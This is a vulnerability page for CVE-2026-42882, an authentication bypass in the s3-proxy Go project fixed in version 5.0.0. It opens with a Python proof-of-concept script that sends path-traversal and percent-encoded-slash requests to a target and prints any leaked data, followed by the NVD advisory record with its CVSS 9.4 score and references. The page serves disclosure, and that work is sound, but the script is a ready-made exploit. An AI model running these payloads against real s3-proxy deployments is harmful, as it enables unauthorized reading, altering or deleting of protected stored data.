CVE-2026-42882

import requests # CVE-2026-42882 PoC: Authentication Bypass via Path Traversal/Encoding # Target: Vulnerable s3-proxy instance # Description: Exploits the mismatch between raw URI (auth) and decoded path (handler) target = "http://vulnerable-s3-proxy:8080" # Technique 1: Path Traversal using glob patterns (*) # Assuming "/public/*" is allowed but "/admin/" is restricted. # The '*' might match across separators depending on config. payload_traversal = "/public/../../admin/config.json" # Technique 2: Percent-encoded slash (%2F) # Collapses segments at auth layer but expands at storage layer. payload_encode = "/public%2Fadmin/config.json" print(f"[*] Attempting Path Traversal: {target}{payload_traversal}") r = requests.get(f"{target}{payload_traversal}") if r.status_code == 200: print(f"[+] Success! Data leaked: {r.text[:100]}") else: print(f"[-] Failed with status: {r.status_code}") print(f"[*] Attempting Encoded Slash: {target}{payload_encode}") r = requests.get(f"{target}{payload_encode}") if r.status_code == 200: print(f"[+] Success! Data leaked: {r.text[:100]}") else: print(f"[-] Failed with status: {r.status_code}")

{"cve": {"id": "CVE-2026-42882", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:44.450", "lastModified": "2026-05-11T20:25:44.450", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "oxyno-zeta/s3-proxy is an aws s3 proxy written in go. Prior to 5.0.0, s3-proxy contains an authentication bypass caused by inconsistent URL path interpretation between the authentication middleware and the bucket handler. The authentication middleware evaluates resource path patterns against the percent-encoded request URI (r.URL.RequestURI()), while the bucket handler constructs S3 object keys from the decoded path (r.URL.Path). This mismatch, combined with the glob library being invoked without a path separator (causing * to match across / boundaries), allows unauthenticated attackers to write to, read from, or delete objects in protected S3 namespaces. Exploitation is possible via three techniques: (1) using * patterns\nthat match across path separators to reach protected routes via path traversal (e.g., /open/foo/drafts/../restricted/), (2) using percent-encoded slashes (%2F) to collapse multiple path segments into a single token at the auth layer while the decoded form resolves to a protected namespace at the storage layer, and (3) using dot-dot segments (../) under ** prefix patterns, where the raw path matches an open route while Go's URL parser resolves the traversal to a protected path before the bucket handler runs. An unauthenticated attacker with network access can perform unauthorized PUT, GET, or DELETE operations on objects in authentication-protected S3 namespaces. This vulnerability is fixed in 5.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/oxyno-zeta/s3-proxy/commit/1320e4abd46ad18c2851fedde50dbb79df8b7a51", "source": "[email protected]"}, {"url": "https://github.com/oxyno-zeta/s3-proxy/commit/af5ff57d8c6022459495b8fb50130073bca7b48a", "source": "[email protected]"}, {"url": "https://github.com/oxyno-zeta/s3-proxy/security/advisories/GHSA-rfgq-wgg8-662p", "source": "[email protected]"}]}}